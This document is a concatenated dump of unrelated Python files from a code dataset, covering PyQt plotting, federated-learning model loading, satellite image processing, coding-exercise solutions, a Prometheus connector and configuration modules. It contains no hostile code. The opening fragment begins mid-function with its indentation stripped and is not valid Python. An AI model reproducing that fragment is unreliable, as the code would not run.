else:
self.views[2].hide()
if self.six_views_visible:
self.views[5].hide()
def show2Rows(self, checked):
if checked:
self.six_views_visible = True
self.views[3].show()
self.views[4].show()
self.views[5].show()
self.ui.pushButtonManagerOrange.show()
self.ui.pushButtonManagerGrey.show()
self.ui.pushButtonManagerCyan.show()
else:
self.six_views_visible = False
self.views[3].hide()
self.views[4].hide()
self.views[5].hide()
self.ui.pushButtonManagerOrange.hide()
self.ui.pushButtonManagerGrey.hide()
self.ui.pushButtonManagerCyan.hide()
self.controller.update_slice_views()
    def on_interpolate(self, checked):
        """Slot: toggle image interpolation and redraw all views."""
        self.model.set_interpolation(checked)
        self.update_slice_views()
def on_orientation(self, orientation: str):
"""
Activated when the orientation combobox is changed
:return:
"""
# convert the str to an enum member
orientation = Orientation[orientation]
if self.link_views:
for v in self.views.values():
v.set_orientation(orientation)
else:
v = self.controller.current_view
v.set_orientation(orientation)
class ColorScaleBar(object):
    """Colour scale bar for the heatmap, rendered with pyqtgraph.

    Shows the negative and positive LUTs stacked vertically with the
    level values as text labels, plus an 'Invert color' button that flips
    between dark-on-light and light-on-dark.

    Fixes in this revision: duplicated pushButtonInvertColor.hide()/show()
    calls removed from hide()/show(); on_invert() de-duplicated; stray
    trailing token after the final ``pass`` removed (it broke the syntax).
    """

    def __init__(self, layout, neg_lut, pos_lut):
        """
        Parameters
        ----------
        layout
            Qt layout the scale-bar widget and invert button are added to.
        neg_lut, pos_lut
            RGBA lookup tables for the negative/positive halves.
        """
        self.color_scale_widget = pg.GraphicsLayoutWidget()
        self.color_scale_widget.setMaximumSize(150, 300)
        self.color_scale_widget.setMinimumSize(150, 300)
        self.color_scale_widget.hide()
        self.layout = layout
        self.layout.addWidget(self.color_scale_widget)
        self.color_scale_view = self.color_scale_widget.addViewBox(row=0, col=0, enableMouse=False, lockAspect=True)
        self.font = QtGui.QFont('Arial', 13, QtGui.QFont.Bold)
        self.neg_lut = neg_lut
        self.pos_lut = pos_lut
        self.pushButtonInvertColor = QtGui.QPushButton('Invert color')
        self.pushButtonInvertColor.clicked.connect(self.on_invert)
        self.layout.addWidget(self.pushButtonInvertColor)
        self.pushButtonInvertColor.hide()
        # fixed label positions (view coordinates)
        self.neg_text_coords = [10, 13]
        self.pos_text_coords = [10, 210]
        self.tstat_label_coords = [-5, 140]

    def update(self, max_pos, min_neg, min_pos, max_neg):
        """Rebuild the scale-bar image and labels for the given levels.

        NOTE(review): the caller passes (pos_upper, pos_lower, neg_upper,
        neg_lower); the parameter names here do not match that order --
        confirm the intended mapping before renaming anything.
        """
        # rebuild the view box from scratch on every update
        if self.color_scale_view:
            self.color_scale_widget.removeItem(self.color_scale_view)
        self.color_scale_view = self.color_scale_widget.addViewBox(row=0, col=0, enableMouse=False, lockAspect=True)
        self.min_pos_text = pg.TextItem(str(round(min_pos, 2)))
        self.min_neg_text = pg.TextItem(str(round(min_neg, 2)))
        self.max_pos_text = pg.TextItem(str(round(max_pos, 2)))
        self.max_neg_text = pg.TextItem(str(round(max_neg, 2)))
        # turn each LUT (rows = channels) into a stack of single-pixel
        # RGBA columns so it can be rendered as an image strip
        rgba_pos = []
        for x in range(0, self.pos_lut.shape[1]):
            col = self.pos_lut[:, x]
            slice_ = np.array([col])
            rgba_pos.append(slice_.T)
        rgba_neg = []
        for x in range(0, self.neg_lut.shape[1]):
            col = self.neg_lut[:, x]
            slice_ = np.array([col])
            rgba_neg.append(slice_.T)
        pos_img = np.dstack(tuple(rgba_pos)).astype(np.uint8)
        neg_img = np.dstack(tuple(rgba_neg)).astype(np.uint8)
        full_img = np.rot90(np.vstack((neg_img, pos_img)))
        # remove the black section of the colormap from the negative scale
        # (padding of 0 currently removes nothing)
        remove_padding = 0
        remove_start = int(full_img.shape[1] / 2 - remove_padding)
        remove_end = int(full_img.shape[1] / 2 + remove_padding)
        remove_range = range(remove_start, remove_end)
        full_img = np.delete(full_img, remove_range, axis=1)
        ii = pg.ImageItem(full_img)
        ii.setRect(QtCore.QRect(0, 0, 10, 200))
        self.color_scale_view.addItem(self.max_pos_text)
        self.color_scale_view.addItem(self.min_neg_text)
        self.color_scale_view.addItem(self.min_pos_text)
        self.color_scale_view.addItem(self.max_neg_text)
        self.max_pos_text.setFont(self.font)
        self.min_neg_text.setFont(self.font)
        self.min_pos_text.setFont(self.font)
        self.max_neg_text.setFont(self.font)
        self.max_neg_text.setPos(*self.neg_text_coords)
        self.max_pos_text.setPos(*self.pos_text_coords)
        self.color_scale_view.addItem(ii)
        # place the inner labels relative to the rendered image: map image
        # coordinates into view coordinates
        min_pos_y = (full_img.shape[1] / 2) + 20
        min_pos_y_mapped = self.color_scale_view.mapFromItemToView(ii, QtCore.QPointF(40, min_pos_y))
        self.min_pos_text.setPos(9, min_pos_y_mapped.y())
        min_neg_y = full_img.shape[1] / 2 + 80
        min_neg_y_mapped = self.color_scale_view.mapFromItemToView(ii, QtCore.QPointF(40, min_neg_y))
        self.min_neg_text.setPos(13, min_neg_y_mapped.y())
        self.label = pg.TextItem('t-statistics', angle=-90)
        self.label.setFont(self.font)
        self.color = 'white'
        self.color_scale_view.addItem(self.label)
        self.label.setPos(*self.tstat_label_coords)
        # NOTE(review): this resets inversion on every update -- confirm
        # that losing the inverted state on redraw is intended.
        self.inverted = False

    def redraw(self):
        # Placeholder: redrawing is currently handled by update().
        pass

    def on_invert(self):
        """Slot: flip between dark-on-light and light-on-dark rendering."""
        self.inverted = not self.inverted
        if self.inverted:
            fg = QtGui.QColor(255, 255, 255)
            bg = QtGui.QColor(0, 0, 0)
        else:
            fg = QtGui.QColor(0, 0, 0)
            bg = QtGui.QColor(255, 255, 255)
        for text_item in (self.label, self.max_pos_text, self.min_pos_text,
                          self.max_neg_text, self.min_neg_text):
            text_item.textItem.setDefaultTextColor(fg)
        self.color_scale_widget.setBackground(bg)

    def hide(self):
        """Hide the scale bar and its invert button."""
        self.pushButtonInvertColor.hide()
        self.color_scale_widget.hide()

    def show(self):
        """Show the scale bar and its invert button."""
        self.pushButtonInvertColor.show()
        self.color_scale_widget.show()

    def set_minimum_value(self, value):
        # Placeholder: not implemented yet.
        pass

    def set_maximum_value(self, value):
        # Placeholder: not implemented yet.
        pass
# Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from typing import List
import torch
from nvflare.apis.dxo import DXO, DataKind
from nvflare.apis.fl_constant import FLContextKey
from nvflare.apis.fl_context import FLContext
from nvflare.app_common.abstract.model_locator import ModelLocator
from nvflare.app_common.pt.pt_fed_utils import PTModelPersistenceFormatManager
from nvflare.app_common.app_constant import DefaultCheckpointFileName
class PTModelLocator(ModelLocator):
    """ModelLocator exposing the server's current and best global models."""

    SERVER_MODEL_NAME = "server"
    SERVER_BEST_MODEL_NAME = "server_best"

    def __init__(
        self, model_dir="app_server",
        model_name=DefaultCheckpointFileName.GLOBAL_MODEL,
        best_model_name=DefaultCheckpointFileName.BEST_GLOBAL_MODEL
    ):
        """A ModelLocator that provides the global and best global models.

        Args:
            model_dir: directory where global models are saved.
            model_name: name of the saved global model.
            best_model_name: name of the saved best global model.

        Returns:
            a DXO depending on the specified `model_name` in `locate_model()`.
        """
        super().__init__()
        self.model_dir = model_dir
        self.model_file_name = model_name
        self.best_model_file_name = best_model_name

    def get_model_names(self, fl_ctx: FLContext) -> List[str]:
        """Names of the server-side models offered for cross-site validation.

        Args:
            fl_ctx (FLContext): FL Context object.

        Returns:
            List[str]: List of model names.
        """
        return [PTModelLocator.SERVER_MODEL_NAME, PTModelLocator.SERVER_BEST_MODEL_NAME]

    def locate_model(self, model_name, fl_ctx: FLContext) -> DXO:
        """Load the requested checkpoint and wrap it in a WEIGHTS DXO.

        Returns None for unknown names or when the checkpoint cannot be
        loaded (the error is logged).
        """
        engine = fl_ctx.get_engine()
        known = (PTModelLocator.SERVER_MODEL_NAME,
                 PTModelLocator.SERVER_BEST_MODEL_NAME)
        if model_name not in known:
            return None
        # resolve <workspace>/<run>/<model_dir>/<checkpoint file>
        run_number = fl_ctx.get_prop(FLContextKey.CURRENT_RUN)
        run_dir = engine.get_workspace().get_run_dir(run_number)
        model_path = os.path.join(run_dir, self.model_dir)
        if model_name == PTModelLocator.SERVER_BEST_MODEL_NAME:
            file_name = self.best_model_file_name
        else:
            file_name = self.model_file_name
        model_load_path = os.path.join(model_path, file_name)
        try:
            model_data = torch.load(model_load_path)
            self.log_info(fl_ctx, f"Loaded {model_name} model from {model_load_path}.")
        except Exception as e:
            self.log_error(fl_ctx, f"Unable to load model: {e}.")
            return None
        mgr = PTModelPersistenceFormatManager(model_data)
        return DXO(data_kind=DataKind.WEIGHTS, data=mgr.var_dict, meta=mgr.meta)
| StarcoderdataPython |
23344 | <gh_stars>0
#!/usr/bin/env python
u"""
read_iceye_h5.py
Written by <NAME>' (03/2022)
Read ICEYE Single Look Complex and Parameter file using GAMMA's Python
integration with the py_gamma module.
usage: read_iceye_h5.py [-h] [--directory DIRECTORY]
TEST: Read ICEye Single Look Complex and Parameter.
optional arguments:
-h, --help show this help message and exit
--directory DIRECTORY, -D DIRECTORY
Project data directory.
--slc SLC, -C SLC Process and single SLC.
PYTHON DEPENDENCIES:
argparse: Parser for command-line options, arguments and sub-commands
https://docs.python.org/3/library/argparse.html
datetime: Basic date and time types
https://docs.python.org/3/library/datetime.html#module-datetime
tqdm: Progress Bar in Python.
https://tqdm.github.io/
py_gamma: GAMMA's Python integration with the py_gamma module
UPDATE HISTORY:
"""
# - Python Dependencies
from __future__ import print_function
import os
import argparse
import datetime
from tqdm import tqdm
# - GAMMA's Python integration with the py_gamma module
import py_gamma as pg
# - Utility Function
from utils.make_dir import make_dir
def main():
    """Convert ICEYE HDF5 SLC products to GAMMA SLC + parameter files.

    Either a single file (--slc) or every ``*.h5`` in ``<directory>/input``
    is processed; outputs go to ``<directory>/output/slc+par``.

    Refactor: the per-file extraction logic that was duplicated across the
    two branches is factored into a local helper, and the non-portable
    ``split('/')`` is replaced with ``os.path.basename``.
    """
    parser = argparse.ArgumentParser(
        description="""TEST: Read ICEye Single Look Complex and Parameter."""
    )
    # - Absolute Path to directory containing input data.
    default_dir = os.path.join(os.path.expanduser('~'), 'Desktop',
                               'iceye_gamma_test')
    parser.add_argument('--directory', '-D',
                        type=lambda p: os.path.abspath(os.path.expanduser(p)),
                        default=default_dir,
                        help='Project data directory.')
    parser.add_argument('--slc', '-C', type=str,
                        default=None, help='Process and single SLC.')
    args = parser.parse_args()

    # - Path to Test directory
    data_dir = os.path.join(args.directory, 'input')
    # - create output directory
    out_dir = make_dir(args.directory, 'output')
    out_dir = make_dir(out_dir, 'slc+par')
    # - ICEye Suffix
    ieye_suff = 'ICEYE_X7_SLC_SM_'

    def extract(b_input):
        """Extract SLC and parameter file for one HDF5 input."""
        b_input_name = os.path.basename(b_input).replace(ieye_suff, '')
        slc_name = os.path.join(out_dir, b_input_name.replace('.h5', '.slc'))
        par_name = os.path.join(out_dir, b_input_name.replace('.h5', '.par'))
        # - Set dtype equal to zero to save the SLC in FCOMPLEX format.
        pg.par_ICEYE_SLC(b_input, par_name, slc_name, 0)

    if args.slc is not None:
        # - Process a single SLC
        extract(os.path.join(data_dir, args.slc))
    else:
        # - Process the entire input directory content
        data_dir_list = [os.path.join(data_dir, x) for x in os.listdir(data_dir)
                         if x.endswith('.h5')]
        for b_input in tqdm(data_dir_list, total=len(data_dir_list), ncols=60):
            extract(b_input)
# - run main program
if __name__ == '__main__':
    # time the full conversion run and report the wall-clock duration
    start_time = datetime.datetime.now()
    main()
    end_time = datetime.datetime.now()
    print(f"# - Computation Time: {end_time - start_time}")
| StarcoderdataPython |
# https://app.codility.com/programmers/lessons/3-time_complexity/
# FrogJmp
#solution 1
import math # use of math
def solution(X, Y, D):
    """FrogJmp: minimum jumps of length D needed to get from X to >= Y."""
    remaining = Y - X
    if remaining == 0:
        return 0
    return math.ceil(remaining / D)
#solution 2
def solution(X, Y, D):
    """FrogJmp (iterative variant): count jumps of D from X until >= Y."""
    jumps = 0
    while X + jumps * D < Y:
        jumps += 1
    return jumps
# PermMissingElem
def solution(A):
    """PermMissingElem: missing value in a permutation of 1..len(A)+1.

    Uses the arithmetic-series sum of 1..n minus the actual sum.
    """
    n = len(A) + 1
    return n * (n + 1) // 2 - sum(A)
# TapeEquilibrium
def solution(A):
    """TapeEquilibrium: minimal |sum(left) - sum(right)| over all splits.

    abs((total - left) - left) is rewritten as abs(total - 2 * left);
    an exact-zero split still short-circuits early.
    """
    total = sum(A)
    left = 0
    best = float('inf')
    for v in A[:-1]:
        left += v
        best = min(best, abs(total - 2 * left))
        if best == 0:
            return 0
    return best
| StarcoderdataPython |
import os
import numpy as np
from PIL import Image
from eratosthenes.generic.mapping_io import read_geo_image
from eratosthenes.preprocessing.shadow_transforms import mat_to_gray, gamma_adjustment, log_adjustment
rgi_id = 'RGI60-01.19773'  # Red Glacier
bbox = (4353, 5279, 9427, 10980)  # 1000 m buffer (row_min, row_max, col_min, col_max)
f2018 = "T05VMG_20180913T214531_B0"
f2020 = "T05VMG_20200912T214531_B0"


def _load_band(prefix, band_digit):
    """Read one Sentinel-2 band, crop to ``bbox`` and rescale to [0, 1]."""
    img, _, _, _ = read_geo_image(os.path.join('header', prefix + band_digit + '.jp2'))
    return mat_to_gray(img[bbox[0]:bbox[1], bbox[2]:bbox[3]])


def _save_log_rgb(red, green, blue, file_name):
    """Stack bands into an 8-bit RGB image, log-stretch and save as JPEG."""
    rgb = np.uint8(255 * np.dstack((red, green, blue)))
    Image.fromarray(log_adjustment(rgb)).save(file_name, quality=95)


# Refactor: the six read/crop/normalise blocks (2 dates x 3 bands) are
# collapsed into _load_band, and the two export blocks into _save_log_rgb.
# Sentinel-2 band 2 = blue, band 3 = green, band 4 = red.
# NOTE(review): gamma_adjustment is imported but unused -- confirm it can
# be dropped from the import line.
I_18_b, I_18_g, I_18_r = (_load_band(f2018, d) for d in ('2', '3', '4'))
I_20_b, I_20_g, I_20_r = (_load_band(f2020, d) for d in ('2', '3', '4'))

_save_log_rgb(I_18_r, I_18_g, I_18_b, "Red-sen2-13-09-2018.jpg")
_save_log_rgb(I_20_r, I_20_g, I_20_b, "Red-sen2-12-09-2020.jpg")
| StarcoderdataPython |
"""
<NAME>
descriptor.py
Takes in a directory of sub-directories of images and produces a descriptor
file for all the images found in the sub-directories.
,:'/ _..._
// ( `""-.._.'
\| / 6\___
| 6 4
| /
\_ .--'
(_'---'`)
/ `'---`()
,' |
, .'` |
)\ _.-' ;
/ | .'` _ /
/` / .' '. , |
/ / / \ ; | |
| \ | | .| | |
\ `"| /.-' | | |
'-..-\ _.;.._ | |.;-.
\ <`.._ )) | .;-. ))
(__. ` ))-' \_ ))'
`'--"` `""`
I'll describe each image for you...okay that first one is gray...the
second one is also gray...the next one's gray...
"""
import os
import sys
import pickle
import cv2 as cv
import numpy as np
def read_train_dir(train_dir):
    """Collect images from the known background sub-directories of *train_dir*.

    Only sub-directories named after one of the five supported backgrounds
    (grass, ocean, redcarpet, road, wheatfield) are scanned.  Each matching
    directory contributes one list of images; the outer list follows
    os.listdir order.
    """
    backgrounds = {"grass", "ocean", "redcarpet", "road", "wheatfield"}
    return [
        find_images(train_dir + "/" + entry)
        for entry in os.listdir(train_dir)
        if entry in backgrounds
    ]
def find_images(dir):
    """Load every .jpeg image in *dir* with OpenCV.

    Files whose name does not end in '.jpeg' (case-insensitive) are skipped.
    Prints a message and exits the program if an image cannot be decoded.

    :param dir: path of the directory to scan
    :return: list of BGR images (numpy arrays), in os.listdir order
    """
    images = list()
    for fil in os.listdir(dir):
        if fil.lower().endswith('.jpeg'):
            # cv.imread never raises on a bad file -- it returns None, so the
            # previous "except cv.error" could never fire and malformed images
            # were silently appended as None.  Check the result instead.
            img = cv.imread(dir + "/" + fil, 1)
            if img is None:
                print("{} malformed!".format(fil))
                sys.exit()
            images.append(img)
    return images
def get_3D_hist(sub_img):
    """Compute a 4x4x4 colour histogram of an H x W x 3 sub-image.

    The pixels are flattened into an (H*W, 3) array of colour triples and
    binned with 4 bins per channel; the 4x4x4 array of bin counts is
    returned.
    """
    bins_per_channel = 4
    colour_triples = sub_img.reshape(-1, 3)
    counts, _edges = np.histogramdd(colour_triples,
                                    (bins_per_channel,) * 3)
    return counts
def get_sub_imgs(img):
    """Split *img* into a 5x5 grid of equally sized blocks.

    Block (i, j) covers columns [i*dw, (i+1)*dw) and rows [j*dh, (j+1)*dh),
    where dw = W // 5 and dh = H // 5; remainder pixels on the right and
    bottom edges are discarded.  Returns a (5, 5, dh, dw, 3) float array
    indexed as [column, row].
    """
    height, width = img.shape[:2]
    grid = 5
    dw = width // grid
    dh = height // grid
    blocks = np.empty((grid, grid, dh, dw, 3))
    for col in range(grid):
        for row in range(grid):
            blocks[col, row] = img[row * dh:(row + 1) * dh,
                                   col * dw:(col + 1) * dw]
    return blocks
def get_desc_vec(sub_imgs):
    """Build a 1-D descriptor vector from a 5x5 grid of sub-images.

    Each of the 16 grid positions (i, j) with 0 <= i, j < 4 is expanded into
    a 2x2 block by stacking the sub-image with its right, lower and
    lower-right neighbours, so most sub-images contribute to several
    overlapping blocks.  The 4x4x4 colour histograms of all 16 blocks are
    concatenated and flattened into one vector.
    """
    histograms = []
    for col in range(4):
        for row in range(4):
            top = np.hstack((sub_imgs[col, row], sub_imgs[col + 1, row]))
            bottom = np.hstack((sub_imgs[col, row + 1],
                                sub_imgs[col + 1, row + 1]))
            histograms.append(get_3D_hist(np.vstack((top, bottom))))
    return np.hstack(histograms).flatten()
if __name__ == "__main__":
    # Handle command line arguments: exactly one argument, the training
    # directory that contains the background sub-directories.
    if len(sys.argv) != 2:
        print("Usage: {} train_dir".format(sys.argv[0]))
        sys.exit()
    train_dir_name = sys.argv[1]
    try:
        train_dir = read_train_dir(train_dir_name)
    except FileNotFoundError:
        print("{} not found!".format(train_dir_name))
        sys.exit()
    # Compute the descriptor vector of every image found in the
    # sub-directories and pickle the whole list into <train_dir>/desc.txt.
    desc_vec_list = []
    for images in train_dir:
        for img in images:
            desc_vec_list.append(get_desc_vec(get_sub_imgs(img)))
    # "with" guarantees the output file is closed even if pickling fails
    # (the original opened the file before the loop and leaked it on error).
    with open("{}/desc.txt".format(train_dir_name), "wb") as outfile:
        pickle.dump(desc_vec_list, outfile)
| StarcoderdataPython |
1723748 | n = int(input().strip())
a = list(map(int, input().strip().split(' ')))  # the n space-separated integers to sort
# bubble sort, counting the total number of adjacent swaps over all passes
totalNumberOfSwaps = 0
for i in range(n):
    currentSwaps = 0  # swaps made during this single pass over the array
    for j in range(0, n - 1):
        if a[j] > a[j + 1]:
            a[j], a[j + 1] = a[j + 1], a[j] # swap adjacent elements if they are in decreasing order
            currentSwaps += 1
            totalNumberOfSwaps += 1
    # if no elements were swapped during a pass, the array is already sorted
    if currentSwaps == 0:
        break
print('Array is sorted in ' + str(totalNumberOfSwaps) + ' swaps.')
print('First Element: '+ str(a[0]))
print('Last Element: ' + str(a[n - 1])) | StarcoderdataPython |
137373 | import connector_pb2_grpc
import connector_pb2
import grpc
import prom
class Service(connector_pb2_grpc.ConnectorServicer):
    """gRPC servicer exposing Prometheus query results through the Qlik connector API."""
    def GetMetaInfo(self, request, context):
        # Static identification of this connector (name, version, developer).
        return connector_pb2.MetaInfo(
            name = 'Prometheus Connector',
            version = '0.0.1',
            developer = 'Qlik'
        )
    def GetData(self, request, context):
        """Fetch data for a query and stream it back as chunks.

        The connection string is expected to look like
        "promHost=<host:port>;promQuery=<promql>"; promQuery is optional
        and defaults to a match-all query.
        """
        # parse out configuration from connection string
        connectionData = dict(item.split("=") for item in request.connection.connectionString.split(";"))
        host = connectionData.get('promHost', '')
        query = connectionData.get('promQuery', '')
        if not host:
            # require promHost in connection string
            msg = 'Missing promHost=<host:port> in connection string'
            context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
            context.set_details(msg)
            # NOTE(review): raising grpc.RpcError directly from a servicer is
            # unusual -- context.abort(code, details) is the documented way to
            # terminate an RPC with an error; confirm intended behaviour.
            raise grpc.RpcError(grpc.StatusCode.INVALID_ARGUMENT, msg)
        if not query:
            # default to all metrics
            query = '{__name__=~".+"}'
        print('Fetching data from Prometheus host "{}"...'.format(host))
        results = prom.fetch('http://{}/api/v1/query'.format(host), query)
        print('Data fetched, sending initial metadata...')
        metadata = prom.build_metadata(results)
        # field metadata travels out-of-band in the initial gRPC metadata headers
        context.send_initial_metadata((('x-qlik-getdata-bin', metadata.SerializeToString()),))
        print('Initial metadata sent, sending chunks...')
        return prom.build_chunks(results, metadata)
| StarcoderdataPython |
3377017 | <gh_stars>0
import csv
import numpy as np
from sklearn.svm import SVR  # fix: sklearn's support-vector regressor is SVR, not "SRV"
import matplotlib.pyplot as plt
# parallel lists filled by get_data()
dates = []
prices = []
def get_data(filename):
    """Read a CSV of (date, price) rows into the module-level lists.

    The header row is skipped; only the leading '-'-separated component of
    each date string is kept as the date value.
    """
    with open(filename, 'r') as csvfile:
        csvFileReader = csv.reader(csvfile)
        next(csvFileReader)  # skip header
        for row in csvFileReader:
            dates.append(int(row[0].split('-')[0]))
            prices.append(float(row[1]))
    return
def predict_prices(dates, prices, x):
    """Fit linear, polynomial and RBF SVR models, plot them, and return the
    three models' predictions for date value *x* (rbf, linear, poly)."""
    dates = np.reshape(dates, (len(dates), 1))
    svr_lin = SVR(kernel='linear', C=1e3)
    svr_poly = SVR(kernel='poly', C=1e3, degree=2)
    svr_rbf = SVR(kernel='rbf', C=1e3, gamma=0.1)
    svr_lin.fit(dates, prices)
    svr_poly.fit(dates, prices)
    svr_rbf.fit(dates, prices)
    plt.scatter(dates, prices, color='black', label='Data')
    plt.plot(dates, svr_rbf.predict(dates), color='red', label='RBF model')
    plt.plot(dates, svr_lin.predict(dates), color='green', label='Linear model')
    plt.plot(dates, svr_poly.predict(dates), color='blue', label='Polynomial model')
    plt.xlabel("Date")
    plt.ylabel("Price")
    plt.title("SVR")
    plt.legend()
    plt.show()
    # predict() expects a 2-D array of samples, so wrap the scalar date;
    # also fix the "srv_rbf" typo from the original return statement.
    query = [[x]]
    return svr_rbf.predict(query)[0], svr_lin.predict(query)[0], svr_poly.predict(query)[0]
get_data('AAPL.csv')
# fix: original read "predict_prices(dates, price, 29" -- undefined name
# "price" and a missing closing parenthesis
predicted_price = predict_prices(dates, prices, 29)
print(predicted_price) | StarcoderdataPython |
57509 | <filename>project/data/hoc.py
import pandas as pd
import re
from pathlib import Path
from collections import defaultdict, OrderedDict
class HOC():
    """Convert the Hallmarks-of-Cancer corpus layout (one directory per label,
    with <set>.pos/<set>.neg files) into per-split multi-label CSV files."""
    def __init__(self, source_dir, target_dir, replace_csv=True) -> None:
        # Accept either str or Path for both directories.
        self.source_dir = Path(source_dir) if type(
            source_dir) is str else source_dir
        self.target_dir = Path(target_dir) if type(
            target_dir) is str else target_dir
        self.labels = self.get_labels(source_dir)
        # self.new_labels = [new_labels[label] for label in self.labels]
        self.replace_csv = replace_csv
        # Read all three splits ("devel" is saved under the name "val").
        self.train_dict = self.read_dataset(source_dir, self.labels, 'train')
        self.val_dict = self.read_dataset(source_dir, self.labels, 'devel')
        self.test_dict = self.read_dataset(source_dir, self.labels, 'test')
        self.save_csv(self.train_dict, self.target_dir,
                      self.labels, self.replace_csv, set_='train')
        self.save_csv(self.val_dict, self.target_dir,
                      self.labels, self.replace_csv, set_='val')
        self.save_csv(self.test_dict, self.target_dir,
                      self.labels, self.replace_csv, set_='test')
    def save_csv(self, data_dict, target_dir, labels,
                 replace_csv, set_):
        """Write {text: one-hot labels} to hoc_<set>.csv (tab-separated),
        skipping the write when the file exists and replace_csv is False."""
        target_files = set(
            [e.name for e in target_dir.iterdir() if e.is_file()])
        filename = f"hoc_{set_}.csv"
        if (not replace_csv and filename not in target_files) \
                or replace_csv:
            pd.DataFrame.from_dict(
                data_dict, orient='index', columns=labels
            ).to_csv(target_dir / filename, sep='\t')
    def read_dataset(self, source_dir, labels, set_='train'):
        """Gather all <set_>.* files under the label directories and return
        an ordered {sentence: one-hot label vector} mapping."""
        pattern = set_ + '.*'
        data_dict = defaultdict(lambda: [])
        for file in source_dir.rglob(pattern):
            # The label is the name of the directory containing the file.
            self._read_file(file, data_dict, file.parent.name)
        data_dict = {k: self._one_hot(v, labels) for k, v in data_dict.items()}
        return OrderedDict(sorted(data_dict.items()))
    def get_labels(self, source_dir, pattern=r"label-."):
        """Return the sorted names of sub-directories matching 'label-<x>'."""
        labels = []
        for dir_ in source_dir.iterdir():
            if dir_.is_dir() and re.match(pattern, dir_.name):
                labels.append(dir_.name)
        return sorted(labels)
    def _read_file(self, file, data_dict: defaultdict, label):
        """Append *label* to each line of a .pos file; a .neg file only
        registers the line (the bare defaultdict access creates the key)."""
        # NOTE: non-raw "\." in the pattern works but triggers escape warnings.
        pos = re.match(".*\.pos", file.name)
        with open(file, 'r', encoding='utf-8') as f:
            for line in f:
                if line:
                    processed_line = line.strip().replace('\n', '')
                    if pos:
                        data_dict[processed_line].append(label)
                    else:
                        data_dict[processed_line]
        return
    def _one_hot(self, target_labels, all_labels):
        """One-hot encode *target_labels* against the full label list."""
        return [int(x in target_labels) for x in all_labels]
if __name__ == "__main__":
    # Input corpus location and output directory for the generated CSVs.
    SOURCE_DIR, TARGET_DIR = Path("project\data\HoC"), Path("project\data")
    REPLACE_CSV = True
    # Human-readable names for the ten HoC labels.
    # NOTE(review): NEW_LABELS is currently unused -- the corresponding
    # mapping line in HOC.__init__ is commented out.
    NEW_LABELS = {
        "label-1": "Activating invasion and metastasis",
        "label-2": "Avoiding immune destruction",
        "label-3": "Cellular energetics",
        "label-4": "Enabling replicative immortality",
        "label-5": "Evading growth suppressors",
        "label-6": "Genomic instability and mutation",
        "label-7": "Inducing angiogenesis",
        "label-8": "Resisting cell death",
        "label-9": "Sustaining proliferative signaling",
        "label-a": "Tumor promoting inflammation",
    }
    hoc = HOC(SOURCE_DIR, TARGET_DIR, REPLACE_CSV)
| StarcoderdataPython |
1787520 | """Request builders."""
from typing import List
import dacite
import safe_browsing.access.external.contracts as contracts
from safe_browsing.access.external.contracts import SafeBrowsingRequest
def build(threat_entries: List[str]) -> SafeBrowsingRequest:
    """Construct a SafeBrowsingRequest carrying the given threat entries."""
    payload = {"threat_entries": threat_entries}
    return dacite.from_dict(contracts.SafeBrowsingRequest, payload)
| StarcoderdataPython |
3325557 | <reponame>darrengardner-sfc/SnowAlert<gh_stars>0
from os import environ
import uuid
from runners.helpers.dbconfig import DATABASE
# Runtime configuration, resolved once at import time from SA_* environment
# variables with the defaults below.
ENV = environ.get('SA_ENV', 'unset')  # deployment environment label
# generated once per runtime
RUN_ID = uuid.uuid4().hex
# schema names
DATA_SCHEMA_NAME = environ.get('SA_DATA_SCHEMA_NAME', "data")
RULES_SCHEMA_NAME = environ.get('SA_RULES_SCHEMA_NAME', "rules")
RESULTS_SCHEMA_NAME = environ.get('SA_RESULTS_SCHEMA_NAME', "results")
# table names
RESULTS_ALERTS_TABLE_NAME = environ.get('SA_RESULTS_ALERTS_TABLE_NAME', "alerts")
RESULTS_VIOLATIONS_TABLE_NAME = environ.get('SA_RESULTS_VIOLATIONS_TABLE_NAME', "violations")
QUERY_METADATA_TABLE_NAME = environ.get('SA_QUERY_METADATA_TABLE_NAME', "query_metadata")
RUN_METADATA_TABLE_NAME = environ.get('SA_RUN_METADATA_TABLE_NAME', "run_metadata")
# fully qualified schema names (<DATABASE>.<schema>)
DATA_SCHEMA = environ.get('SA_DATA_SCHEMA', f"{DATABASE}.{DATA_SCHEMA_NAME}")
RULES_SCHEMA = environ.get('SA_RULES_SCHEMA', f"{DATABASE}.{RULES_SCHEMA_NAME}")
RESULTS_SCHEMA = environ.get('SA_RESULTS_SCHEMA', f"{DATABASE}.{RESULTS_SCHEMA_NAME}")
# fully qualified table names (<schema>.<table>)
ALERTS_TABLE = environ.get('SA_ALERTS_TABLE', f"{RESULTS_SCHEMA}.{RESULTS_ALERTS_TABLE_NAME}")
VIOLATIONS_TABLE = environ.get('SA_VIOLATIONS_TABLE', f"{RESULTS_SCHEMA}.{RESULTS_VIOLATIONS_TABLE_NAME}")
QUERY_METADATA_TABLE = environ.get('SA_QUERY_METADATA_TABLE', f"{RESULTS_SCHEMA}.{QUERY_METADATA_TABLE_NAME}")
RUN_METADATA_TABLE = environ.get('SA_METADATA_RUN_TABLE', f"{RESULTS_SCHEMA}.{RUN_METADATA_TABLE_NAME}")
# misc: suffixes that identify rule kinds by object name
ALERT_QUERY_POSTFIX = "ALERT_QUERY"
ALERT_SQUELCH_POSTFIX = "ALERT_SUPPRESSION"
VIOLATION_QUERY_POSTFIX = "VIOLATION_QUERY"
VIOLATION_SQUELCH_POSTFIX = "VIOLATION_SUPPRESSION"
# enabling sends metrics to cloudwatch
CLOUDWATCH_METRICS = environ.get('CLOUDWATCH_METRICS', False)
# resolved settings as (name, value) pairs for consumers that enumerate them
CONFIG_VARS = [
    ('ALERTS_TABLE', ALERTS_TABLE),
    ('VIOLATIONS_TABLE', VIOLATIONS_TABLE),
    ('QUERY_METADATA_TABLE', QUERY_METADATA_TABLE),
    ('RUN_METADATA_TABLE', RUN_METADATA_TABLE),
    ('DATA_SCHEMA', DATA_SCHEMA),
    ('RULES_SCHEMA', RULES_SCHEMA),
    ('RESULTS_SCHEMA', RESULTS_SCHEMA),
]
| StarcoderdataPython |
